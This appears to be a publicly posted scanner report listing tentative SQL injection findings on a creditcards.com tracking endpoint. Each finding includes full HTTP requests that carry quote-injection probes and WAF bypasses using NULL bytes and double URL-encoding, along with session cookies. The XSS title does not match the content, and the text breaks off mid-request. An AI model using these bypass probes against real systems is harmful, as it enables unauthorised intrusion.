XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 06172011-02

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

One common defence is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defence is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defence may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defence to be bypassed.
Another often cited defence is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.

1.1. http://cctrkom.creditcards.com/b/ss/ccardsccdc-us/1/H.17/s02926937902811 [REST URL parameter 3] next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://cctrkom.creditcards.com
Path:	/b/ss/ccardsccdc-us/1/H.17/s02926937902811

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss/ccardsccdc-us%00'/1/H.17/s02926937902811?AQB=1&ndh=1&t=17/5/2011%207%3A12%3A25%205%20300&ns=creditcardscom&pageName=TYPE%3Alow-interest&g=http%3A//www.creditcards.com/low-interest.php&r=http%3A//www.creditcards.com/&cc=USD&ch=TYPE&v0=999-0-0-0&c1=low-interest&c9=7%3A00AM&v9=Chase_Freedom_Visa__100___June_Landing_Page_Test__Jun__1__2011_&c10=Friday&v10=9134&c11=Weekday&v11=Chase_Freedom__100_Visa___Landing_Page___June_Test___22125634%3DForced_Control_22125744&c12=%5BCS%5Dv1%7C26FD9772051603E8-60000177A00CCF03%5BCE%5D&v14=999-0-0-0%3E999-0-9999-9999%3E999-0-0-0%3E999-0-9999-9999%3E999-0-0-0&v15=7%3A00AM&v16=Friday&v17=Weekday&v18=%5BCS%5Dv1%7C26FD9772051603E8-60000177A00CCF03%5BCE%5D&v28=TYPE%3Alow-interest&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=893&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&pid=home&pidt=1&oid=http%3A//www.creditcards.com/low-interest.php&ot=A&AQE=1 HTTP/1.1
Host: cctrkom.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/low-interest.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCCID=173.193.214.243_20110617053924_f5fd4d9c; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; SSSC=3.49665759.60098554.232.9134; PHPSESSID=51aa464adc6191c5beb2eec47b2e003f; ACTREF=51aa464adc6191c5beb2eec47b2e003f_999__201106170712; CURRREF=999; THIRDREF=999; PREVREF=999; s_sq=ccardsccdc-us%3D%2526pid%253Dhome%2526pidt%253D1%2526oid%253Dhttp%25253A//www.creditcards.com/low-interest.php%2526ot%253DA; s_cc=true; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307269913%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308307272532%27%5D%2C%5B%27999-0-0-0%27%2C%271308311460361%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308312000435%27%5D%2C%5B%27999-0-0-0%27%2C%271308312745248%27%5D%5D

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 17 Jun 2011 12:27:07 GMT
Server: Omniture DC/2.0.0
Content-Length: 419
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/ccardsccdc-us was not found on this server.</p>
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/ccardsccdc-us%00''/1/H.17/s02926937902811?AQB=1&ndh=1&t=17/5/2011%207%3A12%3A25%205%20300&ns=creditcardscom&pageName=TYPE%3Alow-interest&g=http%3A//www.creditcards.com/low-interest.php&r=http%3A//www.creditcards.com/&cc=USD&ch=TYPE&v0=999-0-0-0&c1=low-interest&c9=7%3A00AM&v9=Chase_Freedom_Visa__100___June_Landing_Page_Test__Jun__1__2011_&c10=Friday&v10=9134&c11=Weekday&v11=Chase_Freedom__100_Visa___Landing_Page___June_Test___22125634%3DForced_Control_22125744&c12=%5BCS%5Dv1%7C26FD9772051603E8-60000177A00CCF03%5BCE%5D&v14=999-0-0-0%3E999-0-9999-9999%3E999-0-0-0%3E999-0-9999-9999%3E999-0-0-0&v15=7%3A00AM&v16=Friday&v17=Weekday&v18=%5BCS%5Dv1%7C26FD9772051603E8-60000177A00CCF03%5BCE%5D&v28=TYPE%3Alow-interest&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=893&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&pid=home&pidt=1&oid=http%3A//www.creditcards.com/low-interest.php&ot=A&AQE=1 HTTP/1.1
Host: cctrkom.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/low-interest.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCCID=173.193.214.243_20110617053924_f5fd4d9c; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; SSSC=3.49665759.60098554.232.9134; PHPSESSID=51aa464adc6191c5beb2eec47b2e003f; ACTREF=51aa464adc6191c5beb2eec47b2e003f_999__201106170712; CURRREF=999; THIRDREF=999; PREVREF=999; s_sq=ccardsccdc-us%3D%2526pid%253Dhome%2526pidt%253D1%2526oid%253Dhttp%25253A//www.creditcards.com/low-interest.php%2526ot%253DA; s_cc=true; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307269913%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308307272532%27%5D%2C%5B%27999-0-0-0%27%2C%271308311460361%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308312000435%27%5D%2C%5B%27999-0-0-0%27%2C%271308312745248%27%5D%5D

Response 2

HTTP/1.1 404 Not Found
Date: Fri, 17 Jun 2011 12:27:07 GMT
Server: Omniture DC/2.0.0
xserver: www284
Content-Length: 0
Content-Type: text/html

1.2. http://cctrkom.creditcards.com/b/ss/ccardsccdc-us/1/H.17/s0451105509418 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://cctrkom.creditcards.com
Path:	/b/ss/ccardsccdc-us/1/H.17/s0451105509418

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /b%2527/ss/ccardsccdc-us/1/H.17/s0451105509418?AQB=1&ndh=1&t=17/5/2011%207%3A13%3A1%205%20300&ns=creditcardscom&pageName=lead%20confirmation&g=http%3A//www.creditcards.com/oc/%3Fpid%3D22125744%26pg%3D11%26pgpos%3D8&cc=USD&xact=1012011061707130016127154&purchaseID=1012011061707130016127154&events=purchase%2Cevent2&products=11%3B22125744%3B1%3B0&c9=7%3A00AM&c10=Friday&c11=Weekday&c12=%5BCS%5Dv1%7C26FD9772051603E8-60000177A00CCF03%5BCE%5D&v13=1012011061707130016127154&v15=7%3A00AM&c16=8&v16=Friday&v17=Weekday&v18=%5BCS%5Dv1%7C26FD9772051603E8-60000177A00CCF03%5BCE%5D&v25=11&v26=8&v28=lead%20confirmation&v29=11%3A22125744%7C8&v30=11%3A22125744&v31=22125744%7C8&v32=11%7C8&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=893&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: cctrkom.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22125744&pg=11&pgpos=8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCCID=173.193.214.243_20110617053924_f5fd4d9c; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; SSSC=3.49665759.60098554.232.9134; PHPSESSID=51aa464adc6191c5beb2eec47b2e003f; ACTREF=51aa464adc6191c5beb2eec47b2e003f_999__201106170712; CURRREF=999; THIRDREF=999; PREVREF=999; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307269913%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308307272532%27%5D%2C%5B%27999-0-0-0%27%2C%271308311460361%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308312000435%27%5D%2C%5B%27999-0-0-0%27%2C%271308312745248%27%5D%5D; s_sq=%5B%5BB%5D%5D; s_cc=true

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 17 Jun 2011 12:28:40 GMT
Server: Omniture DC/2.0.0
Content-Length: 444
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b%27/ss/ccardsccdc-us/1/H.17/s0451105509418 was not
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b%2527%2527/ss/ccardsccdc-us/1/H.17/s0451105509418?AQB=1&ndh=1&t=17/5/2011%207%3A13%3A1%205%20300&ns=creditcardscom&pageName=lead%20confirmation&g=http%3A//www.creditcards.com/oc/%3Fpid%3D22125744%26pg%3D11%26pgpos%3D8&cc=USD&xact=1012011061707130016127154&purchaseID=1012011061707130016127154&events=purchase%2Cevent2&products=11%3B22125744%3B1%3B0&c9=7%3A00AM&c10=Friday&c11=Weekday&c12=%5BCS%5Dv1%7C26FD9772051603E8-60000177A00CCF03%5BCE%5D&v13=1012011061707130016127154&v15=7%3A00AM&c16=8&v16=Friday&v17=Weekday&v18=%5BCS%5Dv1%7C26FD9772051603E8-60000177A00CCF03%5BCE%5D&v25=11&v26=8&v28=lead%20confirmation&v29=11%3A22125744%7C8&v30=11%3A22125744&v31=22125744%7C8&v32=11%7C8&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=893&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: cctrkom.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22125744&pg=11&pgpos=8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCCID=173.193.214.243_20110617053924_f5fd4d9c; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; SSSC=3.49665759.60098554.232.9134; PHPSESSID=51aa464adc6191c5beb2eec47b2e003f; ACTREF=51aa464adc6191c5beb2eec47b2e003f_999__201106170712; CURRREF=999; THIRDREF=999; PREVREF=999; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307269913%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308307272532%27%5D%2C%5B%27999-0-0-0%27%2C%271308311460361%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308312000435%27%5D%2C%5B%27999-0-0-0%27%2C%271308312745248%27%5D%5D; s_sq=%5B%5BB%5D%5D; s_cc=true

Response 2

HTTP/1.1 404 Not Found
Date: Fri, 17 Jun 2011 12:28:40 GMT
Server: Omniture DC/2.0.0
xserver: www616
Content-Length: 0
Content-Type: text/html

1.3. http://cctrkom.creditcards.com/b/ss/ccardsccdc-us/1/H.17/s06995899085886 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://cctrkom.creditcards.com
Path:	/b/ss/ccardsccdc-us/1/H.17/s06995899085886

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

Request 1

GET /b%00'/ss/ccardsccdc-us/1/H.17/s06995899085886?AQB=1&ndh=1&t=17/5/2011%207%3A12%3A51%205%20300&ns=creditcardscom&pageName=lead%20confirmation&g=http%3A//www.creditcards.com/oc/%3Fpid%3D22144656%26pg%3D11%26pgpos%3D3&cc=USD&xact=1012011061707125038979657&purchaseID=1012011061707125038979657&events=purchase%2Cevent2&products=11%3B22144656%3B1%3B0&c9=7%3A00AM&c10=Friday&c11=Weekday&c12=%5BCS%5Dv1%7C26FD9772051603E8-60000177A00CCF03%5BCE%5D&v13=1012011061707125038979657&v15=7%3A00AM&c16=3&v16=Friday&v17=Weekday&v18=%5BCS%5Dv1%7C26FD9772051603E8-60000177A00CCF03%5BCE%5D&v25=11&v26=3&v28=lead%20confirmation&v29=11%3A22144656%7C3&v30=11%3A22144656&v31=22144656%7C3&v32=11%7C3&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=893&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: cctrkom.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22144656&pg=11&pgpos=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCCID=173.193.214.243_20110617053924_f5fd4d9c; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; SSSC=3.49665759.60098554.232.9134; PHPSESSID=51aa464adc6191c5beb2eec47b2e003f; ACTREF=51aa464adc6191c5beb2eec47b2e003f_999__201106170712; CURRREF=999; THIRDREF=999; PREVREF=999; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307269913%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308307272532%27%5D%2C%5B%27999-0-0-0%27%2C%271308311460361%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308312000435%27%5D%2C%5B%27999-0-0-0%27%2C%271308312745248%27%5D%5D; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 17 Jun 2011 12:27:12 GMT
Server: Omniture DC/2.0.0
Content-Length: 402
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b%00''/ss/ccardsccdc-us/1/H.17/s06995899085886?AQB=1&ndh=1&t=17/5/2011%207%3A12%3A51%205%20300&ns=creditcardscom&pageName=lead%20confirmation&g=http%3A//www.creditcards.com/oc/%3Fpid%3D22144656%26pg%3D11%26pgpos%3D3&cc=USD&xact=1012011061707125038979657&purchaseID=1012011061707125038979657&events=purchase%2Cevent2&products=11%3B22144656%3B1%3B0&c9=7%3A00AM&c10=Friday&c11=Weekday&c12=%5BCS%5Dv1%7C26FD9772051603E8-60000177A00CCF03%5BCE%5D&v13=1012011061707125038979657&v15=7%3A00AM&c16=3&v16=Friday&v17=Weekday&v18=%5BCS%5Dv1%7C26FD9772051603E8-60000177A00CCF03%5BCE%5D&v25=11&v26=3&v28=lead%20confirmation&v29=11%3A22144656%7C3&v30=11%3A22144656&v31=22144656%7C3&v32=11%7C3&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=893&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: cctrkom.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22144656&pg=11&pgpos=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCCID=173.193.214.243_20110617053924_f5fd4d9c; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; SSSC=3.49665759.60098554.232.9134; PHPSESSID=51aa464adc6191c5beb2eec47b2e003f; ACTREF=51aa464adc6191c5beb2eec47b2e003f_999__201106170712; CURRREF=999; THIRDREF=999; PREVREF=999; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307269913%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308307272532%27%5D%2C%5B%27999-0-0-0%27%2C%271308311460361%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308312000435%27%5D%2C%5B%27999-0-0-0%27%2C%271308312745248%27%5D%5D; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 404 Not Found
Date: Fri, 17 Jun 2011 12:27:12 GMT
Server: Omniture DC/2.0.0
xserver: www603
Content-Length: 0
Content-Type: text/html

1.4. http://cctrkom.creditcards.com/b/ss/ccardsccdc-us/1/H.17/s91529709035530 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://cctrkom.creditcards.com
Path:	/b/ss/ccardsccdc-us/1/H.17/s91529709035530

Issue detail

Request 1

GET /b'/ss/ccardsccdc-us/1/H.17/s91529709035530?AQB=1&ndh=1&t=17/5/2011%206%3A59%3A51%205%20300&ns=creditcardscom&pageName=lead%20confirmation&g=http%3A//www.creditcards.com/oc/%3Fpid%3D22034407%26pg%3D17%26pgpos%3D4&r=http%3A//www.creditcards.com/business.php&cc=USD&xact=1012011061706595020302843&purchaseID=1012011061706595020302843&events=purchase%2Cevent2&products=17%3B22034407%3B1%3B0&c9=6%3A30AM&c10=Friday&c11=Weekday&c12=%5BCS%5Dv1%7C26FD9772051603E8-60000177A00CCF03%5BCE%5D&v13=1012011061706595020302843&v15=6%3A30AM&c16=4&v16=Friday&v17=Weekday&v18=%5BCS%5Dv1%7C26FD9772051603E8-60000177A00CCF03%5BCE%5D&v25=17&v26=4&v28=lead%20confirmation&v29=17%3A22034407%7C4&v30=17%3A22034407&v31=22034407%7C4&v32=17%7C4&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=893&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&pid=TYPE%3Abusiness&pidt=1&oid=http%3A//www.creditcards.com/oc/%3Fpid%3D22034407%26pg%3D17%26pgpos%3D4&ot=A&AQE=1 HTTP/1.1
Host: cctrkom.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22034407&pg=17&pgpos=4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCCID=173.193.214.243_20110617053924_f5fd4d9c; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; SSSC=3.49665759.60098554.232.9134; PHPSESSID=eaa1e85235ccec63f45bfe7e1b69c40f; ACTREF=eaa1e85235ccec63f45bfe7e1b69c40f_999__201106170650; CURRREF=999; PREVREF=999; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307269913%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308307272532%27%5D%2C%5B%27999-0-0-0%27%2C%271308311460361%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308311990921%27%5D%5D; s_sq=ccardsccdc-us%3D%2526pid%253DTYPE%25253Abusiness%2526pidt%253D1%2526oid%253Dhttp%25253A//www.creditcards.com/oc/%25253Fpid%25253D22034407%252526pg%25253D17%252526pgpos%25253D4%2526ot%253DA; s_cc=true

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 17 Jun 2011 12:15:07 GMT
Server: Omniture DC/2.0.0
Content-Length: 443
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b'/ss/ccardsccdc-us/1/H.17/s91529709035530 was not f
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b''/ss/ccardsccdc-us/1/H.17/s91529709035530?AQB=1&ndh=1&t=17/5/2011%206%3A59%3A51%205%20300&ns=creditcardscom&pageName=lead%20confirmation&g=http%3A//www.creditcards.com/oc/%3Fpid%3D22034407%26pg%3D17%26pgpos%3D4&r=http%3A//www.creditcards.com/business.php&cc=USD&xact=1012011061706595020302843&purchaseID=1012011061706595020302843&events=purchase%2Cevent2&products=17%3B22034407%3B1%3B0&c9=6%3A30AM&c10=Friday&c11=Weekday&c12=%5BCS%5Dv1%7C26FD9772051603E8-60000177A00CCF03%5BCE%5D&v13=1012011061706595020302843&v15=6%3A30AM&c16=4&v16=Friday&v17=Weekday&v18=%5BCS%5Dv1%7C26FD9772051603E8-60000177A00CCF03%5BCE%5D&v25=17&v26=4&v28=lead%20confirmation&v29=17%3A22034407%7C4&v30=17%3A22034407&v31=22034407%7C4&v32=17%7C4&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=893&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&pid=TYPE%3Abusiness&pidt=1&oid=http%3A//www.creditcards.com/oc/%3Fpid%3D22034407%26pg%3D17%26pgpos%3D4&ot=A&AQE=1 HTTP/1.1
Host: cctrkom.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22034407&pg=17&pgpos=4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCCID=173.193.214.243_20110617053924_f5fd4d9c; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; SSSC=3.49665759.60098554.232.9134; PHPSESSID=eaa1e85235ccec63f45bfe7e1b69c40f; ACTREF=eaa1e85235ccec63f45bfe7e1b69c40f_999__201106170650; CURRREF=999; PREVREF=999; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307269913%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308307272532%27%5D%2C%5B%27999-0-0-0%27%2C%271308311460361%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308311990921%27%5D%5D; s_sq=ccardsccdc-us%3D%2526pid%253DTYPE%25253Abusiness%2526pidt%253D1%2526oid%253Dhttp%25253A//www.creditcards.com/oc/%25253Fpid%25253D22034407%252526pg%25253D17%252526pgpos%25253D4%2526ot%253DA; s_cc=true

Response 2

HTTP/1.1 404 Not Found
Date: Fri, 17 Jun 2011 12:15:07 GMT
Server: Omniture DC/2.0.0
xserver: www614
Content-Length: 0
Content-Type: text/html

1.5. http://cctrkom.creditcards.com/b/ss/ccardsccdc-us/1/H.17/s91529709035530 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://cctrkom.creditcards.com
Path:	/b/ss/ccardsccdc-us/1/H.17/s91529709035530

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

Request 1

GET /b/ss/ccardsccdc-us/1%00'/H.17/s91529709035530?AQB=1&ndh=1&t=17/5/2011%206%3A59%3A51%205%20300&ns=creditcardscom&pageName=lead%20confirmation&g=http%3A//www.creditcards.com/oc/%3Fpid%3D22034407%26pg%3D17%26pgpos%3D4&r=http%3A//www.creditcards.com/business.php&cc=USD&xact=1012011061706595020302843&purchaseID=1012011061706595020302843&events=purchase%2Cevent2&products=17%3B22034407%3B1%3B0&c9=6%3A30AM&c10=Friday&c11=Weekday&c12=%5BCS%5Dv1%7C26FD9772051603E8-60000177A00CCF03%5BCE%5D&v13=1012011061706595020302843&v15=6%3A30AM&c16=4&v16=Friday&v17=Weekday&v18=%5BCS%5Dv1%7C26FD9772051603E8-60000177A00CCF03%5BCE%5D&v25=17&v26=4&v28=lead%20confirmation&v29=17%3A22034407%7C4&v30=17%3A22034407&v31=22034407%7C4&v32=17%7C4&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=893&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20